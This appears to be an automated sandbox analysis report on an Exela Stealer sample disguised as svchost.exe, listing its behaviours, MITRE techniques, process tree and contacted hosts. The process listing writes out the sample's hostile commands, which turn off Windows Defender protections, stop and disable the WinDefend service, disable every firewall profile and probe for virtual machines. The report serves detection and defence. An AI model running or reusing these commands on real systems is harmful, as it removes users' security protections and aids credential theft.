Malware Analysis Report

2025-08-10 19:57

Sample ID 250630-wqfmwstps2
Target svchost.exe
SHA256 126d168549578cad4d37c87fbe0d85f5516c0449e82f19314c5c07bace902797
Tags
exelastealer collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V16
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

Contains code to disable Windows Defender

Exelastealer family

Exela Stealer

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

Grants admin privileges

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Network Service Discovery

UPX packed file

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Launches sc.exe

Browser Information Discovery

Detects Pyinstaller

System Network Connections Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Permission Groups Discovery: Local Groups

Unsigned PE

Gathers system information

Gathers network information

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Collects information from the system

Detects videocard installed

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-06-30 18:07

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2025-06-30 18:07

Reported

2025-06-30 18:09

Platform

win10v2004-20250610-en

Max time kernel

104s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A

Grants admin privileges

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\ARP.EXE N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A

Permission Groups Discovery: Local Groups

discovery

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5492 wrote to memory of 5608 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 5492 wrote to memory of 5608 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 5492 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 5492 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 5492 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 5492 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 2636 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 6092 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 1556 wrote to memory of 6092 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 4976 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 5876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1316 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1316 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3872 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3872 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2456 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4976 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1052 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 6092 wrote to memory of 5728 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5728 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 5728 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5728 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5236 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5236 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4976 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mousocoreworker.exe
PID 4976 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mousocoreworker.exe
PID 4976 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4976 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6092 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4628 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Users\Admin\AppData\Local\Temp\no defender.exe

"C:\Users\Admin\AppData\Local\Temp\no defender.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Stop-Service -Name 'WinDefend' -Force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-Service -Name 'WinDefend' -StartupType Disabled"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "gdb --version"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get Manufacturer

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get Manufacturer

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

